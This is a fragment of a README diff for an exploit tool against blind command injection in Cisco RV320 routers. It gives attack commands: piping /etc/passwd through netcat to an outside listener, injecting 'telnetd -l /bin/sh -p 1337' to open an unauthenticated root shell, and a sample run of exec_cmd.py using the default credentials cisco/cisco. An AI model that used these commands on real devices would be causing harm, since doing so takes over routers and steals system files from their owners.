0x27/CiscoRV320Dump/README.md

 The command injection is blind, so you won't get any output.
 The environment is an incredibly limited Busybox setup with a crippled netcat, and the boxes are mips64, so I didn't bother writing a reverse-shell exploit this time.
 You can, however, get command output by doing stuff like `cat /etc/passwd | nc HOST PORT` and having a listener running, or whatever.

+You can also inject a command like `telnetd -l /bin/sh -p 1337` and connect to the resultant telnet service, which will serve you up a nice unauthenticated root shell.

 Example run of the exploit below:
 ```
 $ python exec_cmd.py -t x.x.x.x -s -p 8443 -U cisco -P cisco -c "cat /etc/passwd | nc x.x.x.x 1337"